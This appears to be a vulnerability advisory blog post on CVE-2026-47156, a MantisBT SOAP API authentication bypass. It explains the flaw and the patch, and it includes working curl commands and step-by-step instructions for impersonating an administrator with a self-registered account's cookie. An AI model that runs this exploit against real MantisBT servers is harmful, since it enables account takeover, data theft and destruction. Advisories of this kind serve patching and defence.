Listen to this Post
How CVE-2026-47156 Works
The vulnerability resides in the SOAP API’s `mci_check_login()` function within MantisBT versions 2.28.3 and earlier. This function is responsible for authenticating SOAP API requests. The core issue is that the function accepts a `cookie_string` parameter from the client and a `username` parameter, and then authenticates the user based on these without properly verifying that the supplied cookie belongs to the supplied user.
Any user who possesses a valid cookie_string—which is stored in the browser’s `MANTIS_STRING_COOKIE` cookie after a successful login—can use it to impersonate any other user. The attacker only needs to know the target’s username. This includes the administrator account, and the attacker does not need to know the target’s password.
The vulnerability is particularly dangerous because self-registration ($g_allow_signup) is enabled by default in MantisBT. This means an attacker with zero prior access can simply register a new account on the target MantisBT instance, log in to obtain their own valid `cookie_string` from their browser, and then use that cookie to impersonate any other user via the SOAP API.
It is important to note that the REST API and the Web UI are not affected by this vulnerability. The REST API’s `AuthMiddleware` derives the username server-side from the API token or session cookie, preventing username spoofing. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the `MANTIS_STRING_COOKIE` against the logged-in user through auth_is_cookie_valid(), with the username derived server-side from the cookie, not supplied by the client.
DailyCVE Form
Platform: MantisBT
Version: <= 2.28.3
Vulnerability: Auth Bypass
Severity: Critical
Date: 2026-07-15
Prediction: 2026-07-01
What Undercode Say
Undercode’s analysis highlights the severe implications of this authentication bypass:
– Attack Vector: Network-based, exploitable remotely.
– Prerequisites: Default configuration (self-registration enabled) and knowledge of a target username.
– Complexity: Low; requires only a valid `cookie_string` from any user account.
– Automatability: Yes, the attack can be fully automated.
– Technical Impact: Total; grants full administrator privileges to the SOAP API.
Bash Commands and Codes:
1. Retrieve your own `cookie_string` after logging in:
Using curl to login and capture cookies curl -i -X POST 'https://target-mantisbt.com/login.php' \ --data 'username=attacker&password=attacker_password' \ --cookie-jar cookies.txt The MANTIS_STRING_COOKIE value is now in cookies.txt
2. Craft a SOAP request to impersonate an administrator:
Using the captured cookie_string to authenticate as 'administrator' SOAP_ENV="<soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'> <soap:Header/> <soap:Body> <mc_project_get_issues xmlns='http://future.mantisbt.org/'> <username>administrator</username> <password>dummy</password> <project_id>1</project_id> </mc_project_get_issues> </soap:Body> </soap:Envelope>" curl -X POST 'https://target-mantisbt.com/api/soap/mantisconnect.php' \ -H 'Content-Type: text/xml' \ -H 'SOAPAction: ""' \ --cookie "MANTIS_STRING_COOKIE=<YOUR_COOKIE_STRING>" \ --data "$SOAP_ENV"
Note: The `password` parameter can be arbitrary; the authentication relies on the provided cookie_string.
Exploit
The exploitation of CVE-2026-47156 is straightforward and can be broken down into the following steps:
1. Account Registration: If self-registration is enabled (default), the attacker creates a new user account on the vulnerable MantisBT instance.
2. Cookie Acquisition: The attacker logs into the newly created account and extracts the `MANTIS_STRING_COOKIE` value from their browser’s cookies.
3. Impersonation: The attacker sends a crafted SOAP request to the MantisBT SOAP API endpoint (/api/soap/mantisconnect.php). This request includes:
– The target’s username (e.g., “administrator”) as the `username` parameter.
– Any value (e.g., “dummy”) as the `password` parameter.
– The `MANTIS_STRING_COOKIE` obtained in step 2 in the HTTP Cookie header.
4. Privilege Escalation: The `mci_check_login()` function accepts the provided `cookie_string` and authenticates the request as the specified `username` without verifying cookie-to-user ownership. The attacker now has full access to all 71 SOAP operations with the privileges of the impersonated user.
Protection
The primary and only recommended protection against CVE-2026-47156 is to upgrade to MantisBT version 2.28.4 or later. This version contains the official patch that fixes the authentication bypass in the SOAP API.
No effective workarounds exist. While disabling the SOAP API can mitigate the risk, it is not a complete solution as it may break functionality for integrations that rely on it. Furthermore, disabling the SOAP API does not prevent an attacker from retrieving user account information, including email addresses and real names.
Impact
The impact of this vulnerability is critical due to the extensive capabilities granted to an attacker with administrator-level SOAP API access:
– Complete Data Exfiltration: An attacker can read all issues (including private ones and notes), download all attachments, and exfiltrate all user account details (ID, name, email) and non-private configuration values.
– Destructive Operations: The attacker can delete projects, issues, attachments, tags, categories, and versions, leading to significant data loss and service disruption.
– Data Manipulation: The attacker can create or modify issues, impersonate reporters, and manage the entire project structure.
– Chaining with Other Vulnerabilities: Gaining administrator privileges via the SOAP API allows an attacker to exploit other SOAP-related vulnerabilities that require elevated privileges, potentially leading to remote code execution or further system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

